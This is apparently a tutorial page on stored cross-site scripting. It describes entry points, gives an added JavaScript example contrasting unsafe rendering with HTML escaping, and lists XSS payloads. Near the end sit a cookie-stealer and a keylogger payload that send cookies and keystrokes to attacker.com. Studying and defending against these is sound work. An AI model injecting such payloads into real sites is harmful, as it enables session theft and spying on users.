It follows the same logic as reflected XSS, except that the malicious JavaScript code is stored directly in the web application's database and is executed when a user, an admin or the attacker visits the page where the attacker injected the code. As a result, the attacker can grab the session cookie or even establish a reverse shell connection. This often happens when a website accepts user input that is not sanitized (sanitizing means removing the "bad parts" of a user's input) when it is inserted into the database. An attacker then places a payload in a field when signing up to a website, and that field is stored in the website's database. If the website doesn't properly sanitize that field, then when the site displays that field on the page, the payload executes for everyone who visits it.

Entry Points

  • Comments on a blog

  • User profile information

  • Website listings
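The following is an added example, not code from the original page. It renders two stored fields (a comment and a profile name) first by plain concatenation and then with output encoding, and checks which tags end up in the markup. The rows are constructed and reuse payloads listed on this page. The names storedRows, escapeHtml, renderCommentUnsafe, renderCommentSafe and injectedTags are assumptions made for the illustration.

```javascript
// Added example (not from the original page): stored fields rendered
// with and without output encoding. All names here are hypothetical.

// Constructed sample rows, as they would come back from the database.
// The second row holds payloads from this page, stored verbatim.
const storedRows = [
  { author: 'alice', comment: 'Nice post!' },
  { author: '"><img src=x onerror=alert(String.fromCharCode(88,83,83));>',
    comment: '<svg onload=alert(String.fromCharCode(88,83,83))>' },
];

const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode a value for HTML element content and quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Vulnerable: stored text is concatenated into the markup as-is, so the
// leading "> closes the value attribute and the input tag.
function renderCommentUnsafe(row) {
  return `<li><input name="author" value="${row.author}"><p>${row.comment}</p></li>`;
}

// Hardened: every stored field is encoded at the point of output.
function renderCommentSafe(row) {
  return `<li><input name="author" value="${escapeHtml(row.author)}">` +
         `<p>${escapeHtml(row.comment)}</p></li>`;
}

// Names of tags in the markup that the template itself never emits.
function injectedTags(html) {
  const templateTags = new Set(['li', 'input', 'p']);
  return [...html.matchAll(/<\/?([a-z][a-z0-9]*)/gi)]
    .map((m) => m[1].toLowerCase())
    .filter((name) => !templateTags.has(name));
}

for (const row of storedRows) {
  console.log('unsafe:', injectedTags(renderCommentUnsafe(row)));
  console.log('safe:  ', injectedTags(renderCommentSafe(row)));
}
```

Encoding at output time covers rows that were stored before any input filter existed, which is why it is applied in the renderer rather than only at insert time.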

Example Payloads


suitable for escaping input tags


suitable for escaping text areas

<img src=x onerror=alert('XSS');>
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<svg onload=alert('XSS')>
<svg onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
// Some code<svg onload=alert(String.fromCharCode(88,83,83))>
"><svg onload=alert(/XSS/)>
<svg><script href=data:,alert(1) /> (Firefox is the only browser which allows self closing script)
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>

Cookie Stealer

<script>fetch('https://attacker.com/cookie' + btoa(document.cookie));</script>



Keylogger payload that records every keystroke on a certain page

<script>document.onkeypress = function(e) {
    fetch('https://attacker.com/log?key=' + btoa(e.key));
}</script>

